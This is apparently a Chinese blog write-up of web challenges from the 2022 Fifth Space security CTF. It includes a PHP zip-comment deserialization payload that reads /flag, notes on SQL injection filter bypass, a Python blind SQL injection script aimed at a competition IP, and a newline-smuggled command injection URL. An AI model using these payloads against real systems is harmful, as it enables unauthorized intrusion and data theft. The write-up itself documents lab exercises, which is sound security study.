Web

5_web_BaliYun

www.zip源码

<?php
class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = $_FILES["file"]["name"];
        $this->ext = end(explode(".", $_FILES["file"]["name"]));
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }

    public function start(){
        return $this->check();
    }

    private function check(){
        if(file_exists($this->filename)){
            return "Image already exsists";
        }elseif(!in_array($this->ext, $this->Valid_ext)){
            return "Only Image Can Be Uploaded";
        }else{
            return $this->move();
        }
    }

    private function move(){
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
        return "Upload succsess!";
    }

    public function __wakeup(){
        echo file_get_contents($this->filename);
    }
}

class check_img{
    public $img_name;
    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    public function img_check(){
        if(file_exists($this->img_name)){
            return "Image exsists";
        }else{
            return "Image not exsists";
        }
    }
}
<?php
class upload{
    public $filename;
}

class check_img{
    public $img_name;
}

$u = new upload();
$c = new check_img();

$u->filename="/flag";
$final = serialize($u);
$zip = new ZipArchive();
$res = $zip->open('space.zip',ZipArchive::CREATE); 
$zip->addFromString('crispr.txt', 'file content goes here');
$zip->setArchiveComment($final);
$zip->close();

图片flag{sdbvETXct77cKuRWKCw8frYEfXEYhDCa}

5_easylogin

sql注入

图片(1)fuzz过滤 存在用户admin

blacklist

or
|
and
"
#
%20
&
^
updatexml
sleep
rand
like
handler
extractvalue
benchmark
value
regexp
=

whitelist

'
--
/**/
select
%09
%0a

从返回头看到是gbk编码,尝试宽字节注入

img

最后构造虚表登陆

图片(3)

5_web_Eeeeasy_SQL

image

引号被过引号滤了,使用反斜杠逃逸,or可以用 利用pow整型溢出报错,使用(password<0x50)判断原理如下

img

图片(5)

图片(6)

当大于小于都报错的时候就是等于,根据这个原理注入出来password为

图片(7)

同理注入从而盲注出用户名和密码 Flag_Account:G1ve_Y0u@K3y_70_937_f14g!!!

脚本

# -*- coding: utf-8 -*-
# @Time : 2022/9/19 17:15
# @Author : pysnow
import requests
import string

url = 'http://39.107.81.36:54028/api/api.php?command=login'
res = ''
tmp = ''
ses = requests.session()
dic = string.ascii_letters + string.digits + '_@!{}'
for i in range(32):
    for j in range(27, 127):
        tmp = hex(j)[2:]
        payload = "or\x09(case\x09when(binary(password)>0x" + res + tmp + ")\x09then\x091\x09else\x09pow(99,9999999)\x09end)#"
        data = {
            "username": 'admin\\',
            "password": payload
        }
        # print(payload)
        r = ses.post(url=url, data=data, allow_redirects=False)
        if 'success' not in r.text:
            res += hex(j - 1)[2:]
            break
    print(res)

这里要用binary转换为2进制比较,直接字符串比较会分不清大小写访问api/flag.php,给了源码读文件过滤了/flag,直接//flag进行绕过图片(8)图片(9)

5_web_letmeguess_1

提示弱口令,admin:admin123

接着命令执行绕过

ls->dir
/->cd ..(也可以使用${}构造斜杠)

http://39.106.155.180:8267/index.php?ip=127.0.0.1%0Acd%09ky*%0Anl%09*
最后修改:2022 年 09 月 22 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏
本文作者:
 文章标题:2022第五空间网络安全大赛
 本文地址:https://pysnow.cn/archives/427/
 版权说明:若无注明,本文皆Pysnow's Blog原创,转载请保留文章出处。